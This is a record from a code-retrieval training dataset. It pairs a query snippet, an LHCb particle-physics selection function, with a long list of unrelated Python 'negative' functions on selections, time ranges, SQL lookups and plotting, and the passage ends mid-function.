_dauCuts) _sel = Selection ( name+'Sel', Algorithm = _D0, RequiredSelections = inputSel ) if not useTOS: return _sel _selD2hhHlt1TOS = makeTISTOS( name + "D2hhHlt1TOS" , _sel , Hlt1TOS ) _selD2hhHlt2TOS = makeTISTOS( name + "D2hhHlt2TOS" , _selD2hhHlt1TOS , Hlt2TOS ) return _selD2hhHlt2TOS
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def rangeselector_time():\n return {\n \"bgcolor\": \"rgb(35, 149, 86)\",\n \"activecolor\": \"rgb(25, 108, 62)\",\n \"buttons\": [\n {\"count\": 12, \"label\": \"12h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 24, \"label\": \"24h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 48, \"label\": \"48h\", \"step\": \"hour\", \"stepmode\": \"backward\"},\n {\"count\": 3, \"label\": \"3d\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 7, \"label\": \"7d\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"step\": \"all\"},\n ],\n }", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def select_hours(self, lhours):\n sel = []\n for i in range(self.dataset.shape[0]):\n stime = time.localtime(np.int32(self.dataset[i][2]))\n hour = stime[3]\n for ih in lhours:\n ihour, fhour = ih\n if ihour <= hour < fhour:\n sel.append(i)\n data = STData(self.wpath, self.city, self.application)\n data.dataset = self.dataset[sel]\n return data", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc_low, disc_high,))\n return [h[0] for h in pickup]", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? 
and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (-disc_high, -disc_low))\n return [h[0] for h in pickup]", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def get_selection(self, selection_name, format=None):", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def get_h0(self, t):\n return self.h0", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def build_selection_spec(client_factory, name):\r\n sel_spec = 
client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def getSect(self, h):\n coordtrasp=self.coord.T\n lefttomin=self.coord[1][:self.min+1]\n # left point\n lpnt = self.firstPointAfter_h(lefttomin[::-1], h)\n # find index of left point\n l_pnt = self.min - lpnt\n # find left intersection\n l_intersect = self.intersection(coordtrasp[l_pnt], coordtrasp[l_pnt+1], h)\n # right point\n rpnt = self.firstPointAfter_h(self.coord[1][self.min:], h)\n # find index of right point\n r_pnt = self.min + rpnt\n # find right intersection\n r_intersect = self.intersection(coordtrasp[r_pnt], coordtrasp[r_pnt-1], h)\n # make new section geometries\n sez = coordtrasp[l_pnt+1:r_pnt]\n # Add left intersection on the top\n sez=np.insert(sez, [0,], l_intersect,axis=0)\n # Add rightht intersection on the bottom\n sez=np.append(sez,[r_intersect],axis=0)\n return sez", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def cdd_Hrepresentation(self):\n return cdd_Hrepresentation(self._cdd_type, \n [i for i in self.inequalities()],\n [e for e in self.equation_generator()] )", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def shortened_selective(G, H):\n if G == 0 or H == 0:\n return Game(0)\n else:\n left_1 = {shortened_selective(G_L, H) for G_L in G._left}\n left_2 = {shortened_selective(G, H_L) for H_L in H._left}\n left_3 = {shortened_selective(G_L, H_L) for G_L in G._left for H_L in H._left}\n right_1 = {shortened_selective(G_R, H) for G_R in G._right}\n right_2 = {shortened_selective(G, H_R) for H_R in H._right}\n right_3 = {shortened_selective(G_R, H_R) for G_R in G._right for H_R in H._right}\n return Game(left_1 | left_2 | left_3, right_1 | right_2 | right_3)", "def __hour(self):\n return _VirtualColumn(\n df_name=self.thisptr[\"df_name_\"],\n operator=\"hour\",\n operand1=self,\n operand2=None\n )", "def add_selector(self, listing):\n # We will be able to select X-frames and its boundaries\n # will be stored in the given list\n\n def onselect(xmin, xmax):\n# indmin, indmax = np.searchsorted(x, (xmin, xmax))\n# indmax = min(len(x)-1, indmax)\n indmin = xmin\n indmax = xmax\n onselect.listing.append([indmin, indmax])\n print (onselect.listing)\n \n onselect.listing = listing\n \n # set useblit True on gtkagg for enhanced performance\n ax = self.axes\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True,\n rectprops=dict(alpha=0.5, facecolor='red') )\n \n self.widget_list.append(span)", "def data_selection(data, columnX=\"time\", columnY=\"forceX\", ylim=None):\n\n fig = plt.figure(figsize=(8, 6))\n ax = fig.add_subplot(111)\n if ylim is not None:\n ax.set_ylim(ylim[0], ylim[1])\n x = data[columnX]\n y = data[columnY]\n ax.plot(x, y, '-')\n\n fig.suptitle(\"Press any key to confirm selection and close this window\", 
fontsize=14, fontweight='bold')\n ax.set_title(\"Select data by dragging the mouse\")\n\n def onselect(xmin, xmax):\n \"\"\"\n Sub-function to assign the minimum and maximum of the range and plot the selection\"\n\n Args:\n xmin (int): minimum index of selection\n xmax (int): maximum index of selection\n \"\"\"\n global indmin\n global indmax\n global span\n\n try:\n span.remove()\n fig.canvas.draw()\n except:\n pass\n\n indmin, indmax = np.searchsorted(x, (xmin, xmax))\n indmax = min(len(x) - 1, indmax)\n ax.axvspan(x.values[int(indmin)], x.values[int(indmax)], facecolor=\"red\", alpha=0.5)\n fig.canvas.draw()\n\n # set useblit True on gtkagg for enhanced performance\n span = SpanSelector(ax, onselect, 'horizontal', useblit=True, rectprops=dict(alpha=0.5, facecolor='red'))\n mng = plt.get_current_fig_manager()\n mng.window.showMaximized()\n plt.show()\n\n while True:\n wait = plt.waitforbuttonpress(timeout=60)\n if wait:\n plt.close('all')\n break\n else:\n pass\n\n idCol = column_indexer(data)\n mask = (data[columnX] >= data.iloc[indmin, idCol[columnX]]) & \\\n (data[columnX] <= data.iloc[indmax, idCol[columnX]])\n subData = data.loc[mask, :]\n\n return subData", "def hour(self) -> Index:\n warnings.warn(\n \"`hour` will return int32 index instead of int 64 index in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.hour)", "def care_color_HH(selection):\n acids = \"{} and (resn ASP or resn ASH or resn GLU or resn GLH)\".format(selection)\n bases = \"{} and (resn HIS or resn HIE or resn HID or resn HIP or resn ARG \\\n or resn LYS or resn LYN)\".format(selection)\n polars = \"{} and (resn CYS or resn CYX or resn GLN or resn ASN or resn SER \\\n or resn TYR or resn THR)\".format(selection)\n nonpolars = \"{} and (resn GLY or resn ALA or resn LEU or resn ILE or resn PHE \\\n or resn TRP or resn MET or resn PRO or resn VAL)\".format(selection)\n cmd.color(\"firebrick\", acids)\n cmd.color(\"deepteal\", bases)\n cmd.color(\"tv_orange\", polars)\n cmd.color(\"smudge\", nonpolars)\n util.cnc(selection)", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def _getAsSelection(self):\n return self._asSelection", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def get_gti_from_hdu(gtihdu):\n gtitable = gtihdu.data\n\n colnames = [col.name for col in gtitable.columns]\n # Default: NuSTAR: START, STOP. 
Otherwise, try RXTE: Start, Stop\n if \"START\" in colnames:\n startstr, stopstr = \"START\", \"STOP\"\n else:\n startstr, stopstr = \"Start\", \"Stop\"\n\n gtistart = np.array(gtitable.field(startstr), dtype=np.longdouble)\n gtistop = np.array(gtitable.field(stopstr), dtype=np.longdouble)\n gti_list = np.vstack((gtistart, gtistop)).T\n\n return gti_list", "def rangeselector_date():\n return {\n \"bgcolor\": \"rgb(35, 149, 86)\",\n \"activecolor\": \"rgb(25, 108, 62)\",\n \"buttons\": [\n {\"count\": 7, \"label\": \"1w\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 14, \"label\": \"2w\", \"step\": \"day\", \"stepmode\": \"backward\"},\n {\"count\": 1, \"label\": \"1m\", \"step\": \"month\", \"stepmode\": \"backward\"},\n {\"count\": 3, \"label\": \"3m\", \"step\": \"month\", \"stepmode\": \"backward\"},\n {\"step\": \"all\"},\n ],\n }", "def select_time(new_cube, lower, upper):\n\n sliced_cube = new_cube.extract(iris.Constraint(year=lambda y: lower<=y<=upper))\n\n return sliced_cube", "def select(cursor, q, expire_after=None):\n if expire_after:\n query = \"\"\"SELECT h.* FROM hasil h\n JOIN pencarian p ON (p.id=h.query_id)\n WHERE p.query=:query and \n CAST( \n (JULIANDAY('now', 'localtime') - JULIANDAY(p.timestamp)) \n AS INTEGER) <= :expire_after\"\"\"\n \n rows = cursor.execute(query, {'query': q,\n 'expire_after': expire_after})\n return HasilCollections(rows)\n raise NotImplementedError", "def start(self):\n return _uhd_swig.range_t_start(self)", "def __init__(self,\n h=0.01):\n super().__init__(1, 100000000,\n 1, 1,\n 5, 10,\n 0, -1, h)", "def horde_start(self, observation):", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def get_selection(\n cls,\n selections: list[str],\n title: str = \"\",\n subtitle: str = \"\",\n ) -> int:\n menu = cls.make_selection_menu(\n selections=selections,\n title=title,\n subtitle=subtitle,\n show_exit_item=False,\n )\n return cast(int, menu.show())", "def blankUpdateRange(dayHour):\n return { 'position': dayHour, 'updateHistory': [dayHour], 'width': Predictor.rangeWidth }", "def roi_hdu_from_sel(\n sel_image: np.ndarray,\n color_ix: int,\n eye_name: str,\n instrument: str = \"MCAM\",\n sel_fn: str = None,\n) -> fits.PrimaryHDU:\n roi_array = select_roi_by_ix(sel_image, color_ix)\n color_name = roi_color_ix_to_color_name(color_ix, instrument)\n merspect_metadata = {\"EYE\": eye_name, \"SOURCEFN\": Path(sel_fn).name}\n roi_hdu = make_roi_hdu(roi_array, color_name, merspect_metadata)\n roi_hdu.name = color_name + \" \" + eye_name\n return roi_hdu", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def make_selection_menu(\n cls,\n selections: list[str],\n title: str = \"\",\n subtitle: str = \"\",\n *,\n show_exit_item: bool = False,\n ) -> CursesMenu:\n menu = cls(title=title, subtitle=subtitle, show_exit_item=show_exit_item)\n from cursesmenu.items.selection_item import SelectionItem\n\n for index, selection in enumerate(selections):\n menu.items.append(\n SelectionItem(text=selection, index=index, should_exit=True),\n )\n return menu", "def extract_H_ranges(Work: dict) -> str:\n work_H_rows = 
Work[\"libE_info\"][\"H_rows\"]\n if len(work_H_rows) == 1:\n return str(work_H_rows[0])\n else:\n # From https://stackoverflow.com/a/30336492\n ranges = []\n for diff, group in groupby(enumerate(work_H_rows.tolist()), lambda x: x[0] - x[1]):\n group = list(map(itemgetter(1), group))\n if len(group) > 1:\n ranges.append(str(group[0]) + \"-\" + str(group[-1]))\n else:\n ranges.append(str(group[0]))\n return \"_\".join(ranges)", "def select_bounds(ds, bounds):\n \n xs = slice(bounds[0][0], bounds[1][0])\n ys = slice(bounds[1][1], bounds[0][1])\n # select over x and y axis\n return ds.sel(x=xs, y=ys)", "def get_geometry(self, selection_name):", "def generate_24hrs():\n\n hrs = []\n\n for i in xrange(1, 25):\n hrs.append([i, 0])\n\n return hrs", "def _getHyperslabSlices(dsetshape, select):\n\n if select is None:\n # Default: return entire dataset\n return tuple(slice(0, extent) for extent in dsetshape)\n\n if not select.startswith('['):\n msg = \"Bad Request: selection query missing start bracket\"\n raise HTTPError(400, reason=msg)\n if not select.endswith(']'):\n msg = \"Bad Request: selection query missing end bracket\"\n raise HTTPError(400, reason=msg)\n\n # strip brackets\n select = select[1:-1]\n\n select_array = select.split(',')\n if len(select_array) > len(dsetshape):\n msg = \"Bad Request: number of selected dimensions exceeds the rank of the dataset\"\n raise HTTPError(400, reason=msg)\n\n slices = []\n for dim, dim_slice in enumerate(select_array):\n extent = dsetshape[dim]\n\n # default slice values\n start = 0\n stop = extent\n step = 1\n if dim_slice.find(':') < 0:\n # just a number - return slice(start, start + 1, 1) for this dimension\n try:\n start = int(dim_slice)\n except ValueError:\n msg = \"Bad Request: invalid selection parameter (can't convert to int) for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n stop = start + 1\n elif dim_slice == ':':\n # select everything (default)\n pass\n else:\n fields = dim_slice.split(\":\")\n if len(fields) > 3:\n msg = \"Bad Request: Too many ':' seperators for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n try:\n if fields[0]:\n start = int(fields[0])\n if fields[1]:\n stop = int(fields[1])\n if len(fields) > 2 and fields[2]:\n step = int(fields[2])\n except ValueError:\n msg = \"Bad Request: invalid selection parameter (can't convert to int) for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n\n if start < 0 or start > extent:\n msg = \"Bad Request: Invalid selection start parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n if stop > extent:\n msg = \"Bad Request: Invalid selection stop parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n if step <= 0:\n msg = \"Bad Request: invalid selection step parameter for dimension: \" + str(dim)\n raise HTTPError(400, reason=msg)\n slices.append(slice(start, stop, step))\n\n return tuple(slices)", "def __init__(self):\n self.minh = []\n self.maxh = []", "def create_selector_bcg(self, bcg_sd, bcg_time):\n bcg_nr = self.time_to_number(bcg_time)\n bcg = self.filter_line.iloc[0:bcg_nr].mean()\n std = self.filter_line.iloc[0:bcg_nr].std()\n ind = [True if value > bcg+bcg_sd *\n std else False for value in self.filter_line]\n ind2 = ind[1:]\n ind2.append(False)\n index = [i for i in range(0, len(ind)) if ind[i] != ind2[i]]\n\n self.starts = [index[i] for i in range(len(index)) if i % 2 == 0]\n self.ends = [index[i] for i in range(len(index)) if i % 2 != 0]\n\n self.create_on_off()", "def _select_all(self):\n 
sqlstmt = \"SELECT d, h FROM %s\" % self.VIEW\n return [(-d, h) for (d, h) in self.cursor.execute(sqlstmt)]", "def get_selection_first_coord(sel, name=\"(sel)\"):\n\n #print \"--> selection %(name)s: %(sel)s\" % vars()\n cmd.select(name, sel)\n try:\n return numpy.array(cmd.get_model(name).atom[0].coord)\n except IndexError:\n print \"--> empty selection: %(sel)s\" % vars()\n raise", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def _generateTimeSelector(self, dParams, sPreamble, sPostamble):\n\n if WuiDispatcherBase.ksParamEffectiveDate in dParams:\n tsEffective = dParams[WuiDispatcherBase.ksParamEffectiveDate]\n del dParams[WuiDispatcherBase.ksParamEffectiveDate]\n else:\n tsEffective = ''\n\n # Forget about page No when changing a period\n if WuiDispatcherBase.ksParamPageNo in dParams:\n del dParams[WuiDispatcherBase.ksParamPageNo]\n\n sHtmlTimeSelector = '<form name=\"TimeForm\" method=\"GET\">\\n'\n sHtmlTimeSelector += sPreamble;\n sHtmlTimeSelector += '\\n <select name=\"%s\" onchange=\"window.location=' % WuiDispatcherBase.ksParamEffectiveDate\n sHtmlTimeSelector += '\\'?%s&%s=\\' + ' % (webutils.encodeUrlParams(dParams), WuiDispatcherBase.ksParamEffectiveDate)\n sHtmlTimeSelector += 'this.options[this.selectedIndex].value;\" title=\"Effective date\">\\n'\n\n aoWayBackPoints = [\n ('+0000-00-00 00:00:00.00', 'Now', ' title=\"Present Day. Present Time.\"'), # lain :)\n\n ('-0000-00-00 01:00:00.00', '1 hour ago', ''),\n ('-0000-00-00 02:00:00.00', '2 hours ago', ''),\n ('-0000-00-00 03:00:00.00', '3 hours ago', ''),\n\n ('-0000-00-01 00:00:00.00', '1 day ago', ''),\n ('-0000-00-02 00:00:00.00', '2 days ago', ''),\n ('-0000-00-03 00:00:00.00', '3 days ago', ''),\n\n ('-0000-00-07 00:00:00.00', '1 week ago', ''),\n ('-0000-00-14 00:00:00.00', '2 weeks ago', ''),\n ('-0000-00-21 00:00:00.00', '3 weeks ago', ''),\n\n ('-0000-01-00 00:00:00.00', '1 month ago', ''),\n ('-0000-02-00 00:00:00.00', '2 months ago', ''),\n ('-0000-03-00 00:00:00.00', '3 months ago', ''),\n ('-0000-04-00 00:00:00.00', '4 months ago', ''),\n ('-0000-05-00 00:00:00.00', '5 months ago', ''),\n ('-0000-06-00 00:00:00.00', 'Half a year ago', ''),\n\n ('-0001-00-00 00:00:00.00', '1 year ago', ''),\n ]\n fSelected = False;\n for sTimestamp, sWayBackPointCaption, sExtraAttrs in aoWayBackPoints:\n if sTimestamp == tsEffective:\n fSelected = True;\n sHtmlTimeSelector += ' <option value=\"%s\"%s%s>%s</option>\\n' \\\n % (webutils.quoteUrl(sTimestamp),\n ' selected=\"selected\"' if sTimestamp == tsEffective else '',\n sExtraAttrs, sWayBackPointCaption)\n if not fSelected and tsEffective != '':\n sHtmlTimeSelector += ' <option value=\"%s\" selected>%s</option>\\n' \\\n % (webutils.quoteUrl(tsEffective), tsEffective)\n\n sHtmlTimeSelector += ' </select>\\n';\n sHtmlTimeSelector += sPostamble;\n sHtmlTimeSelector += '\\n</form>\\n'\n\n return sHtmlTimeSelector", "def _select_single(self, disc):\n sqlstmt = \"SELECT h FROM %s WHERE d=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc,))\n picked = pickup.fetchone()\n if picked is not None:\n # picked = (h,)\n return picked[0]\n else:\n raise KeyError(str(disc))", "def Clone(self) -> \"itkIsoDataThresholdCalculatorHDUS_Pointer\":\n return _itkIsoDataThresholdCalculatorPython.itkIsoDataThresholdCalculatorHDUS_Clone(self)", "def __init__(self, id, interval, times=0, q=0, s=0):\n self.id = id\n self.interval = interval\n self.times = times\n self.q = q\n self.s = s", "def 
start(self):\n return _uhd_swig.meta_range_t_start(self)", "def get_range(g,h,d): # g: graph; h: head node; d: dependent node\n addresses = sorted(g.nodes.keys())\n h_index = addresses.index(h)\n d_index = addresses.index(d)\n sign = cmp(d_index,h_index)\n return addresses[h_index:d_index+sign:sign]", "def from_harte_interval(cls, harte_interval_string):\n if isinstance(harte_interval_string, int):\n harte_interval_string = str(harte_interval_string)\n harte_interval_string = harte_interval_string.strip(' ')\n return cls(find_item(HARTE_INTERVALS, harte_interval_string))", "def from_hff(cls, hff_data, name=None, args=None):\n _assert_or_raise(hff_data, h5py.Group)\n obj = cls(new_obj=False)\n if u'xmin' in hff_data:\n obj.xmin = hff_data[u'xmin'][()]\n if u'xmax' in hff_data:\n obj.xmax = hff_data[u'xmax'][()]\n if u'ymin' in hff_data:\n obj.ymin = hff_data[u'ymin'][()]\n if u'ymax' in hff_data:\n obj.ymax = hff_data[u'ymax'][()]\n if u'zmin' in hff_data:\n obj.zmin = hff_data[u'zmin'][()]\n if u'zmax' in hff_data:\n obj.zmax = hff_data[u'zmax'][()]\n return obj", "def select(self):\n pass", "def select(self):\n pass", "def viewport_selection():\n sel = oMa.MGlobal.getActiveSelectionList()\n\n for i in range(sel.length()):\n m_obj = sel.getDependNode(i)\n yield m_obj", "def get_empty_obj(ch_temp):\n return ChData(None, time_type.TimeType(), ch_temp)", "def Clone(self) -> \"itkIsoDataThresholdCalculatorHDSS_Pointer\":\n return _itkIsoDataThresholdCalculatorPython.itkIsoDataThresholdCalculatorHDSS_Clone(self)", "def h(self, x, u, t):\n \n x, z = self._split_states( x )\n \n y = self.plant.h( x, u, t)\n \n return y", "def _selection ( self, nick ) :\n \n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n return self.__selections_[ self.name() ].get( nick , None )", "def hxlselect():\n run_script(hxlselect_main)", "def convex_hull(self):\n return self._geomgen(capi.geom_convex_hull)", "def New(*args, **kargs):\n obj = itkIsoDataThresholdCalculatorHDUC.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkIsoDataThresholdCalculatorHDSS.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self):\n self.intervalList = [] # intervalList is a table with \"start\" and \"end\" columns indicating the start and end of each interval", "def select(self):\n\n return self.p[0], self.p[1]", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def raster_time_select_list(self, selected_field, selected_list_state, selected_list_id, is_readonly, select_list_initial_msg):\n\n raster_time_name_value_dic = {'name': ['2', '4'], 'value': ['2', '4']}\n return make_select_list_using_dictionary(raster_time_name_value_dic, selected_field, selected_list_state, selected_list_id, is_readonly, select_list_initial_msg)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , 
inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def select(self):\r\n pass", "def selectaround(document, selection=None):\n selection = selection or document.selection\n default_chars = ['{', '[', '(', '<', '\\'', '\"']\n candidates = []\n for char in default_chars:\n candidate = selectaround_char(document, char, selection)\n if candidate != None:\n candidates.append(candidate)\n if candidates:\n # Select smallest enclosing candidate\n return min(candidates, key=avg_interval_length)", "def getHourColumn(self): \n return self.hourcol", "def get_selection(self, pointer, answer_sheet, sel_none_of_above):\n def answer_parsing(answer_str):\n selections = answer_str.split(\", \")\n try:\n selections = [int(sel) for sel in selections]\n except:\n return None\n else:\n assert len(selections)\n if sel_none_of_above in selections:\n assert len(selections) == 1 # mutual exclusive \"none of the above\"\n return selections\n\n answer = input(\"Please enter the option id(s) delimited by comma ', ': \")\n selections = answer_parsing(answer)\n while selections is None:\n answer = input(\"Please enter the option id(s) delimited by comma ', ': \")\n selections = answer_parsing(answer)\n\n return selections", "def select(self):\n return", "def get_buffer_selection (buffer):\n bounds = buffer.get_selection_bounds()\n if len(bounds) == 0:\n return \"\"\n else:\n return buffer.get_slice(*bounds)", "def parse_range(option):\n return {\"range\": timedelta(days=option)}", "def horde_init(self, horde_info= {}):", "def get_header_table(self , dt, ds = '' , all_ds = '', length = ''):\n index_low = self.unique_dates[ds]['indices'][dt]['low']\n #index_up = self.unique_dates[best_ds]['indices'][dt]['up'] \n hd = self.data[ds]['header_table'][index_low:index_low+length] \n hd['duplicates'] = all_ds \n \n return hd", "def __getSelectionFilter(self):\n \n selectionPairs = []\n selectionPairs.append(('field','field'))\n selectionPairs.append(('spw','spw'))\n selectionPairs.append(('polarization','correlation'))\n selectionPairs.append(('baseline','antenna'))\n selectionPairs.append(('time','timerange'))\n selectionPairs.append(('scan','scan'))\n selectionPairs.append(('uvdist','uvrange'))\n selectionPairs.append(('scanintent','intent'))\n selectionPairs.append(('observation','observation'))\n return self.__generateFilter(selectionPairs)", "def __chanSelection(self, spwsel):\n \n # Split to get each spw in a list\n if spwsel.__contains__(','):\n spwlist = spwsel.split(',') \n else:\n spwlist = spwsel.split(';')\n \n spwid=[]\n chanlist=[]\n # Split to create two lists, one with channels, the other with spwIDs\n for isel in spwlist:\n # Get tail, colon and head\n (s, c, ch) = isel.rpartition(\":\")\n # Remove any blanks\n s = s.strip(' ')\n c = c.strip(' ')\n ch = ch.strip(' ')\n # If no tail, there was no colon to split. 
